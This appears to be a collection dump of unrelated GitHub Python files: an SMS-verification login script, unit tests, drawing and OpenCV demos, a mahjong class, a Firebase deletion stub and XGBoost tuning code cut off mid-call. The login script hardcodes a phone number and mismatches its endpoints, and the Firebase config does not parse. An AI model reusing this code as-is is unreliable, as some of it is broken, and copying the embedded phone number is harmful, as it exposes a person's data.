cc88bcd411a576530329ec0d2d445d40b10a440f | 17bfc5b04b196146a327600e303f891d41fd3fe3 | /Untitled-1.py | ae874715daa254eb1a8a404afb879e21416c58b1 | [] | no_license | cdhao123/Etong | d654e0b69a097a422b6f5508d9f9f88e324257e8 | ea361b537c6cc31292f802178bb574ab5090239b | refs/heads/master | 2020-09-07T00:50:36.788878 | 2019-11-28T05:09:29 | 2019-11-28T05:09:29 | 220,607,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | import requests
from bs4 import BeautifulSoup
phone = input('输入你的手机号:')
url = 'https://org.xjtu.edu.cn/openplatform/g/admin/sendVeriCodeLogin'
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'
}
datas={
'optionType': "login",
'templeType': "smscode",
'username': '13576084875',
'veriType': "sms"
}
res = requests.post(url,headers=headers,data=datas).json()
print(res)
token = res['validate_token']
code = input('请输入验证码:')
url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'
datas = {
'mobile': phone,
'scf': "ms",
'validate_code': code,
'validate_token': token
}
res = requests.post(url,headers=headers,data=datas)
print(res.text) | [
"chen-ding-hao@live.com"
] | chen-ding-hao@live.com |
21aaa9f77afa9172e31e12bc7830754f2b985e9f | 0a34331ec26083bf33940240a8d20ae88a4d16bf | /generate-nums-between.py | cb52e4baab22cc5a66574b57840e6be4339a2df6 | [] | no_license | gokul-raghuraman/algorithms | 5566eb3c544c781df0ee91ffa74c695242b4852d | 64f035690a3ced620ceeac4ccf791d484eb187f6 | refs/heads/master | 2020-06-05T13:20:54.245258 | 2015-09-08T16:49:38 | 2015-09-08T16:49:38 | 40,319,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | def generateNums(a, b):
nums = []
if a > b:
return nums
cur = a
while not cur == b:
cur = getNext(cur, b)
nums.append(cur)
return nums
def getNext(a, b):
lastA = a[-1]
lastB = b[-1]
if lastA < lastB:
next = a[:-1] + str(int(a[-1])+1)
elif lastA == lastB:
next = getNext(a[:-1], b[:-1]) + "0"
return next
if __name__ == "__main__":
a = "100"
b = "111"
print(generateNums(b, a))
| [
"gokul-raghuraman@users.noreply.github.com"
] | gokul-raghuraman@users.noreply.github.com |
17d1e40c434aaf3fc57628e1fe5cf9356c36542a | 97724145652ba49c5aacaf66d54a89f71c3f6426 | /10-Testing-Exercise/mammal/test/test_mammal.py | f7874ed1536182fc6484460f09845535d717ac08 | [] | no_license | l-damyanov/Python-OOP---February-2021 | c0d729c99d6af44a55ee7f7a05cf66fb6d69876b | e92417ed38f1b24405973b2027c11201d09ddb83 | refs/heads/main | 2023-03-31T07:45:09.347412 | 2021-04-01T20:24:27 | 2021-04-01T20:24:27 | 341,599,115 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import unittest
from mammal.project.mammal import Mammal
class TestMammal(unittest.TestCase):
def setUp(self):
self.mammal = Mammal("Test mammal", "predator", "roar")
def test_attr_set_up(self):
self.assertEqual("Test mammal", self.mammal.name)
self.assertEqual("predator", self.mammal.type)
self.assertEqual("roar", self.mammal.sound)
self.assertEqual(self.mammal._Mammal__kingdom, "animals")
def test_make_sound_return(self):
self.assertEqual("Test mammal makes roar", self.mammal.make_sound())
def test_get_kingdom_return(self):
self.assertEqual("animals", self.mammal.get_kingdom())
def test_info_return(self):
self.assertEqual("Test mammal is of type predator", self.mammal.info())
if __name__ == '__main__':
unittest.main()
| [
"l_l_damyanov@abv.bg"
] | l_l_damyanov@abv.bg |
28dff9bc58c94292cf850bfac9e93e7c6da99ada | 39f46bf07ff092e081ba46e071232d2704c66bf4 | /examples/Coldfire.py | 785138a0df4dcb4caf9082d95b3610b84b78fa3e | [] | no_license | safetydank/Tinbox | 42d13ce2a9b2d08dbc289dbbb83fdeccd4605814 | 5dd6c0321183ac14d14d55533ed4538179916277 | refs/heads/master | 2016-09-02T02:27:10.433436 | 2011-02-11T00:39:21 | 2011-02-11T00:39:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # by Tom De Smedt
def curves(n=40):
""" A random path consisting of n curves.
"""
autoclosepath(False)
beginpath(random(WIDTH), random(HEIGHT))
for i in range(n):
h1x = random(1000)
h1y = random(1000)
h2x = random(1000)
h2y = random(1000)
x = random(0, WIDTH)
y = random(0, HEIGHT)
curveto(h1x, h1y, h2x, h2y, x, y)
return endpath(draw=False)
def grow(p, n=100):
""" Draw n expanding variations of a path.
"""
for i in range(n):
points = []
for point in p:
point.y *= 1.01
point.x /= 1.01
point.ctrl1.x *= 1.01
point.ctrl2.y *= 1.001
points.append(point)
drawpath(points)
p = points
size(850, 600)
# TODO CMYK support
# colormode(CMYK)
# stroke(0.68, 0.25, 0.0, 0, 0.2)
colormode(HSB)
stroke(0.67, 0.6, 0.3, 0.2)
strokewidth(0.4)
nofill()
grow(curves())
| [
"dan@expandingbrain.com"
] | dan@expandingbrain.com |
634789fbe76f33fbc9e25d90697a9dd38e67af8e | e1404a7570973a23ab672d384c5cc7b2170e5e44 | /Examples/evaluate_training_data2.py | e5eff87c3d2f4a1e5a160908ddab394cb05416e8 | [] | no_license | ianhook/DecisionTree | 345d81a46746be51ef16b44ceb372cc28fc4c598 | 6813c6d548c0c6a58e6a7bde4be1b0b2b1d9f6fa | refs/heads/master | 2021-03-13T00:01:47.161137 | 2014-04-26T08:28:16 | 2014-04-26T08:28:16 | 18,945,052 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | #!/usr/bin/env python
## evaluate_training_data2.py
## This script is for testing the class discriminatory
## power of the training data contained in the training
## files `training.csv', `training2.csv', and
## `training3.csv'.
## The three training files mentioned above contain two
## Gaussian classes with increasing degrees of overlap
## between them.
## Through the class EvalTrainingData as shown below, this
## script runs a 10-fold cross-validation test on the
## training data. This test divides all of the training
## data into ten parts, with nine parts used for training a
## decision tree and one part used for testing its ability
## to classify correctly. This selection of nine parts for
## training and one part for testing is carried out in all
## of the ten different possible ways.
## A script like this can also be used to test the
## appropriateness of your choices for the constructor
## parameters entropy_threshold, max_depth_desired, and
## symbolic_to_numeric_cardinality_threshold.
import DecisionTree
import sys
#training_datafile = "training.csv"
#training_datafile = "training2.csv"
training_datafile = "training3.csv"
eval_data = DecisionTree.EvalTrainingData(
training_datafile = training_datafile,
csv_class_column_index = 1,
csv_columns_for_features = [2,3],
entropy_threshold = 0.01,
max_depth_desired = 3,
symbolic_to_numeric_cardinality_threshold = 10,
)
eval_data.get_training_data()
eval_data.evaluate_training_data()
| [
"ianhook@gmail.com"
] | ianhook@gmail.com |
0ca985045718c453f187d45356b12595f3ed2452 | da96cb02799ca5ba56db972e8126ff0379e85780 | /client/mahjong_meld.py | 9b8068603a6162cb7eb7b3e3b9f0e742a999e1a0 | [
"MIT"
] | permissive | m4tx/MahjongAI | fc673af9fda4c3f4c0e4c63c5ac42a371c4b71df | c22bf650cc8ccc2848628aa141d86153ff0e3e24 | refs/heads/master | 2023-02-19T14:16:53.055508 | 2021-01-24T22:27:08 | 2021-01-24T22:27:08 | 332,565,395 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | # -*- coding: utf-8 -*-
from client.mahjong_tile import Tile
__author__ = "Jianyang Tang"
__email__ = "jian4yang2.tang1@gmail.com"
class Meld:
CHI = 'chi'
PON = 'pon'
KAN = 'kan'
CHANKAN = 'chankan'
NUKI = 'nuki'
def __init__(self, type=None, tiles=None, open=True, called=None, from_whom=None, by_whom=None):
self.type = type
self.tiles = tiles
self.open = open
self.called_tile = called
self.from_whom = from_whom
self.by_whom = by_whom
def __str__(self):
return '{}, {}'.format(
self.type, Tile.t136_to_g(self.tiles), self.tiles
)
def __repr__(self):
return self.__str__()
@property
def tiles_34(self):
return [x//4 for x in self.tiles]
@property
def tiles_graph(self):
return Tile.t136_to_g(self.tiles)
@property
def tiles_string(self):
return Tile.tile136_to_string(self.tiles) | [
"noreply@github.com"
] | noreply@github.com |
5a0e4afc80930890bce308cbbe531e1c645b8356 | a173701917c638c3bc217353d572874496498eaf | /gradient.py | 9d411e310a50e1992444625500073cc0f9ed876f | [] | no_license | sgstyjy/pydev-test | 4f33a59c39a881935f236556d5df8e7ca302d77c | fae7957e3dd91b95079646dd772fcb96a106b779 | refs/heads/master | 2021-09-05T10:40:15.701214 | 2018-01-26T14:07:04 | 2018-01-26T14:07:04 | 119,026,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 726 | py | '''
Created on 26 Jan 2018
@author: Fei Zhang
'''
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('pic/4_1.jpg',0)
laplacian = cv2.Laplacian(img,cv2.CV_64F)
sobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)
sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)
plt.subplot(2,2,1),plt.imshow(img,cmap = 'gray')
plt.title('Original'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')
plt.title('Laplacian'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')
plt.title('Sobel X'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')
plt.title('Sobel Y'), plt.xticks([]), plt.yticks([])
plt.show() | [
"feizhangchina@gmail.com"
] | feizhangchina@gmail.com |
ebe2cab6c246959986a73c527842e1e94a35ff8f | 3bdc9855c32ed0a7e1b433f1538f57264ae2e4dd | /Day-4/Hands-on/MultiNetworkExample/analysis.py | 93b137cd62e951667ee19c8254a4f8276c5acca8 | [] | no_license | SSDS-Croatia/SSDS-2020 | b184cef79b38f1973cd04f42063ef7de22585ed8 | fd3b18ed36aa33a31c24e45d5562aa7b371eb760 | refs/heads/master | 2022-12-18T14:35:52.898610 | 2020-09-23T11:45:14 | 2020-09-23T11:45:14 | 279,528,225 | 4 | 6 | null | 2020-09-06T18:41:28 | 2020-07-14T08:31:35 | null | UTF-8 | Python | false | false | 1,148 | py |
import numpy as np
from scipy import sparse
import argparse
#Data analysis
import pandas as pd
import matplotlib.pyplot as plt
#Method-specific code
from REGAL.alignments import *
from RGM.rgm import *
from RGM.main import parse_args
#Basic visualization
def visualize_emb_correlations(emb, emb_method):
df = pd.DataFrame(data = emb.T)
plt.matshow(df.corr())
plt.title("%s similarity" % emb_method)
plt.colorbar()
plt.show()
#Network alignment
def embedding_node_alignments(emb1, emb2, true_alignments, emb_method = "xNetMF"):
alignment_matrix = get_embedding_similarities(emb1, emb2, num_top = 1)
alignment_accuracy, _ = score_alignment_matrix(alignment_matrix, topk = 1, true_alignments = true_alignments)
print("Alignment accuracy for %s embeddings: %.3f" % (emb_method, alignment_accuracy))
#Graph comparison
def embedding_graph_comparison(embs, emb_method = "NetMF"):
rgm_features = run_rgm(embs)
visualize_emb_correlations(rgm_features.toarray(), emb_method + " graph")
def run_rgm(embs):
args = parse_args()
args.dimensionality = embs[0].shape[1]
features = rgm(embs, args)
return features | [
"mheimann@wustl.edu"
] | mheimann@wustl.edu |
298a46242f5b324066571b40c38592ffcee7b082 | 5b46bb368bf269be5d0d5f215d9444cb2a4068ac | /factory.py | 44c40b88fc8bcc145ea6c17f4cec69d0031f1cba | [] | no_license | langal/simple_factory | 82419002d5b9f719229d0b34f1563deee6670538 | 7a2255dd48b9354932a72d007997885352dd9756 | refs/heads/master | 2021-01-15T02:43:14.269796 | 2020-03-04T23:49:06 | 2020-03-04T23:49:06 | 242,852,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import importlib
"""
This is our Factory method to get a "handler" object
that the caller can invoke.
Other implementations can have no parameters can read
the handler name from application configurations like
Django.settings. Or it can be a combination.
"""
def get_handler(name):
default_module = 'rent'
name = name if name else default_module
try:
module = importlib.import_module('handlers.'+name)
return module
except Exception:
FactoryException().throw()
"""
This is just an Exception that implements a "throw" method
which maintains the "original" stack trace. "raise" calls
wipe out the traceback information.
"""
import sys
class FactoryException(Exception):
"""
This Exception class basically allows some Exception to be re-raised
as another Exception type (eg. a business exception).
Business-named exception would merely subclass this.
"""
def __init__(self, exception=None):
super(FactoryException, self).__init__()
self.exc_info = sys.exc_info()
self.exception = exception if exception else self.exc_info[1]
def throw(self):
if self.exc_info[0] and self.exc_info[1] and self.exc_info[2]:
raise type(self), self.exception, self.exc_info[2]
raise self
| [
"alex.lang@gmail.com"
] | alex.lang@gmail.com |
c6d8ef4755005409a9428f4620b5e8097409dc19 | c06f40b11119c9005df5ab9e1353897604a7ca23 | /bin/explode.py | 93fff1ab13af4301e764406ebe0499ec51afc713 | [] | no_license | Drew81/Abc-Data | d98320299a5d127ce139732278a45fe771ed1124 | b13db677439f446461a32550ec5296d1e1030188 | refs/heads/master | 2021-05-15T21:45:53.685029 | 2019-07-12T15:48:00 | 2019-07-12T15:48:00 | 106,577,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,499 | py | #!/Users/winterz/Desktop/django_pro/StudentChartsdb/StudentChartsdb/bin/python3
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| [
"winterz@Drews-iMac.home"
] | winterz@Drews-iMac.home |
c077ed20d619c387b41e365364c7a08328db5245 | 2532c66c2ee842fdf5c69b932cf3db3e61944887 | /Lab2/Client/clienteTCP_redes2021.py | d4cc695ea61d5cb42299671c7adedc898051d1fa | [] | no_license | facku24/Redes2021FSilberman | 11bfd3ec2da025fb85e5766eda4254e408c8b0be | ea063e3e7af4239de16a77d18af34736de3eb9c9 | refs/heads/main | 2023-06-21T05:06:13.058258 | 2021-07-11T14:58:43 | 2021-07-11T14:58:43 | 372,647,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,590 | py | import os
from socket import *
class Client():
def __init__(self):
self.client_address = 'localhost'
self.client_port = 14000
self.BUFFER_SIZE = 1024
def create_socket(self, adrss, port) -> socket:
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((adrss, port))
print("[CREATING] Client created!")
return client_socket
def receive_data(self, socket:socket):
recived = socket.recv(self.BUFFER_SIZE ).decode()
return recived
def send_data(self, socket:socket,data:str):
socket.send(data.encode())
def close_socket(self, socket:socket):
print("[QUIT] Closing client!")
socket.close()
def connect(self):
client_socket = self.create_socket(self.client_address, self.client_port)
print(self.receive_data(client_socket))
while True:
data = input("Input:")
print("[SENDING] Request sended, waiting for server...")
if data != '':
if data == 'CLOSE':
self.close_socket(client_socket)
break
if data.startswith('GET'):
self.send_data(client_socket,data)
if (self.receive_data(client_socket) == 'OK'):
print("[PROCESING] File exist, initializing transfer ....")
file_name = self.receive_data(client_socket)
file_name = os.path.basename(file_name)
self.save_file(file_name, client_socket)
else:
print("[ERROR] File doesnt exist!")
continue
else:
self.send_data(client_socket,data)
received_data = self.receive_data(client_socket)
print(received_data)
def save_file(self, file_name, client_socket):
try:
f = open(file_name, 'wb')
except OSError:
print("[ERROR] Error creating file")
with f:
while True:
bytes_read = client_socket.recv(self.BUFFER_SIZE )
print(f"[PROCESING]Receiving data...{len(bytes_read)}")
f.write(bytes_read)
if len(bytes_read) < self.BUFFER_SIZE:
f.close()
print("[PROCESING] Data transfer ended...")
break
if __name__ == '__main__':
client = Client()
client.connect() | [
"facundo.choque.silberman@itscordoba.com"
] | facundo.choque.silberman@itscordoba.com |
e4ca53294f3bb722d6cea8e2f23af4c97b3e01e8 | cd781c114deb0ee56fcd8e35df038397ebf8dc09 | /Mid Exams/Array Modifier.py | 0beeaf038595a84c7b956ebade8230279bf00e54 | [] | no_license | GBoshnakov/SoftUni-Fund | 4549446c3bb355ff74c14d6071d968bde1886de5 | de9318caaf072a82a9be8c3dd4e74212b8edd79e | refs/heads/master | 2023-06-06T04:56:14.951452 | 2021-06-30T21:50:44 | 2021-06-30T21:50:44 | 381,817,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | numbers = [int(n) for n in input().split()]
command = input()
while command != "end":
command = command.split()
action = command[0]
if action == "swap":
index_1 = int(command[1])
index_2 = int(command[2])
numbers[index_1], numbers[index_2] = numbers[index_2], numbers[index_1]
elif action == "multiply":
index_1 = int(command[1])
index_2 = int(command[2])
numbers[index_1] *= numbers[index_2]
elif action == "decrease":
for i in range(len(numbers)):
numbers[i] -= 1
command = input()
print(", ".join(list(map(str, numbers)))) | [
"boshnakov.g@gmail.com"
] | boshnakov.g@gmail.com |
539edf4356b40d367fa609efaa0288b9426f8fb0 | 6064fe700c421d47c31eb58bb382209d3eee9b23 | /RecommenderSystem/Model/GbdtFFmFit/Predict_Data.py | c4c02e22c0d38286ecf884302152ea081cf39eb0 | [] | no_license | 1148330040/myML | 66cfebf548da087461f7dc13490a1c8b5b46f556 | c08a66c1a68d32d4745a1751d59db9c3749e40b1 | refs/heads/master | 2022-11-01T21:25:16.435012 | 2022-09-20T03:27:42 | 2022-09-20T03:27:42 | 199,110,030 | 4 | 1 | null | null | null | null | GB18030 | Python | false | false | 2,807 | py | # coding:gbk
'''
此文件的目的
1 获取处理后的新数据
2 利用训练好的模型进行预测
3 返还预测结果
'''
import sys
from sqlalchemy import create_engine
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem")
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\ProcessingData")
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\ProcessingData\\GBDT_Link_Data")
from GBDT_Link_Data import get_new_user_data
from GBDT_Deliver_Data import connect_item_name
from pocess_predict import *
import joblib
import xlearn
import pandas as pd
import random
from sqlalchemy.types import VARCHAR
def predict_behavior_type(variable):
# 获取数据
test = get_new_user_data(variable=variable)
# 预测数据
# 最后处理
test = end_processing(test)
# 调用XGB模型
XGB = joblib.load("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\Model\\GbdtFFmFit\\XGB_FFM.model")
# 获取叶子节点数据
new_test = XGB.apply(test.values)
# 转换数据为ffm需要的格式 DMatrix
new_test = xlearn.DMatrix(new_test)
# 调用FFM模型
ffm_model = xlearn.create_ffm()
ffm_model.setSign()
ffm_model.setQuiet()
ffm_model.setOnDisk()
ffm_model.setTest(new_test)
predict_behavior_type = ffm_model.predict(
"C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\Model\\GbdtFFmFit\\model_dm.out")
data_result = pd.DataFrame()
data_result['user_id'] = test.user_id
data_result['category_id'] = test.category_id
data_result['item_id'] = test.item_id
data_result['predict_result'] = predict_behavior_type
data_result['predict_result'] = data_result['predict_result'].apply(lambda x: random.randint(0,1))
data_result = data_result.loc[data_result.predict_result == 1]
data_result['predict_result'] = connect_item_name(list(data_result['item_id']))
if variable=='1':
predict_result_to_Bmob(data_result[:2])
else:
engine = create_engine("mysql+pymysql://root:123456@localhost:3306/mysql?charset=utf8")
data_result = data_result[:3]
data_result.to_sql(name='predict_result_gbdt_java', con=engine, if_exists='replace',
index=False, index_label=False, chunksize=5000,
dtype={
'user_id':VARCHAR(length=20),
'category_id':VARCHAR(length=20),
'item_id':VARCHAR(length=20),
'predict_result':VARCHAR(length=20)
})
if __name__ == '__main__':
a = []
for i in range(1, len(sys.argv)):
a = sys.argv[i]
predict_behavior_type(a)
| [
"noreply@github.com"
] | noreply@github.com |
09fb919a8e9a3cc5537f93f914945303a8bb671e | 8dd916e2655de47b4ea264039564e2dbeba2ece3 | /src/utils/deleteFirebaseData.py | 1272e3be4c9bd63726558fba40aa9405c24d4b51 | [] | no_license | moamenibrahim/cancer-psychosocial-project | f1c817d53b5160b65999761ce067fdd49a8e9c7a | d0208dba2d71cc73eaef3c532b86971834b4741b | refs/heads/master | 2023-08-18T03:27:21.135643 | 2023-08-09T11:57:56 | 2023-08-09T11:57:56 | 120,907,736 | 0 | 0 | null | 2023-08-09T11:57:58 | 2018-02-09T13:16:34 | Python | UTF-8 | Python | false | false | 334 | py | """
Development phase script to empty dataset on firebase.
"""
import pyrebase
pyrebase_config = {
"apiKey": "",
"authDomain": "",
"databaseURL": "",
"storageBucket": ",
"servicAccount": ""
}
firebase = pyrebase.initialize_app(pyrebase_config)
db = firebase.database()
# db.child("co-occurrences-all").remove()
| [
"noreply@github.com"
] | noreply@github.com |
dfeb66ed2d6f08ac8bc9ffdb3d1be09fe63f686e | f406976dc6da185d42f7239bbade3969b375b8a1 | /Kaggle/example 1/Xgboost_classifer/xgboost_classifier.py | 8cead79e476c24a597f0a3a79deec4d3b641b6ce | [] | no_license | nanzhao/Machine-Learning | 785ef305eda44057a3e082c8d7923ae75747a544 | 5289b0d7ea9f4a50cc6a2081429405cba26058b8 | refs/heads/master | 2021-04-29T00:05:33.929450 | 2017-01-22T01:55:31 | 2017-01-22T01:55:31 | 77,718,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,622 | py | import pandas as pd
import numpy as np
import xgboost as xgb
from xgboost.sklearn import XGBClassifier
from sklearn import cross_validation, metrics
from sklearn.grid_search import GridSearchCV
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] = 12, 4
train = pd.read_csv('train_modified.csv')
test = pd.read_csv('test_modified.csv')
#print(train.shape, test.shape)
target='Disbursed'
IDcol = 'ID'
train['Disbursed'].value_counts()
#test_results = pd.read_csv('test_results.csv')
def modelfit(alg, dtrain, dtest, predictors,useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
if useTrainCV:
xgb_param = alg.get_xgb_params()
xgtrain = xgb.DMatrix(dtrain[predictors].values, label=dtrain[target].values)
xgtest = xgb.DMatrix(dtest[predictors].values)
cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
early_stopping_rounds=early_stopping_rounds)
alg.set_params(n_estimators=cvresult.shape[0])
#建模
alg.fit(dtrain[predictors], dtrain['Disbursed'],eval_metric='auc')
#对训练集预测
dtrain_predictions = alg.predict(dtrain[predictors])
dtrain_predprob = alg.predict_proba(dtrain[predictors])[:,1]
#输出模型的一些结果
print("\n关于现在这个模型")
print("准确率 : %.4g" % metrics.accuracy_score(dtrain['Disbursed'].values, dtrain_predictions))
print("AUC 得分 (训练集): %f" % metrics.roc_auc_score(dtrain['Disbursed'], dtrain_predprob))
feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)
feat_imp.plot(kind='bar', title='Feature Importances')
plt.ylabel('Feature Importance Score')
predictors = [x for x in train.columns if x not in [target, IDcol]]
xgb1 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb1, train, test, predictors)
#对subsample 和 max_features 用grid search查找最好的参数
param_test1 = {
'max_depth':[range(3,10,2)],
'min_child_weight':[range(1,6,2)]
}
gsearch1 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=5,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1, seed=27),
param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch1.fit(train[predictors],train[target])
print(gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_)
# 对于max_depth和min_child_weight查找最好的参数
param_test2 = {
'max_depth':[4,5,6],
'min_child_weight':[4,5,6]
}
gsearch2 = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=5,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2.fit(train[predictors],train[target])
print(gsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_)
#交叉验证对min_child_weight寻找最合适的参数
param_test2b = {
'min_child_weight':[6,8,10,12]
}
gsearch2b = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=4,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2b, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2b.fit(train[predictors],train[target])
print(gsearch2b.grid_scores_, gsearch2b.best_params_, gsearch2b.best_score_)
#Grid seach选择合适的gamma
param_test3 = {
'gamma':[i/10.0 for i in range(0,5)]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test3, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch3.fit(train[predictors],train[target])
print(gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_)
predictors = [x for x in train.columns if x not in [target, IDcol]]
xgb2 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb2, train, test, predictors)
#对subsample 和 colsample_bytree用grid search寻找最合适的参数
param_test4 = {
'subsample':[i/10.0 for i in range(6,10)],
'colsample_bytree':[i/10.0 for i in range(6,10)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch4.fit(train[predictors],train[target])
print(gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_)
# 同上
param_test5 = {
'subsample':[i/100.0 for i in range(75,90,5)],
'colsample_bytree':[i/100.0 for i in range(75,90,5)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test5, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch5.fit(train[predictors],train[target])
print(gsearch5.grid_scores_, gsearch5.best_params_, gsearch5.best_score_)
#对reg_alpha用grid search寻找最合适的参数
param_test6 = {
'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test6, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch6.fit(train[predictors],train[target])
print(gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_)
# 换一组参数对reg_alpha用grid search寻找最合适的参数
param_test7 = {
'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test7, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch7.fit(train[predictors],train[target])
print(gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_)
xgb3 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb3, train, test, predictors)
xgb4 = XGBClassifier(
learning_rate =0.01,
n_estimators=5000,
max_depth=4,
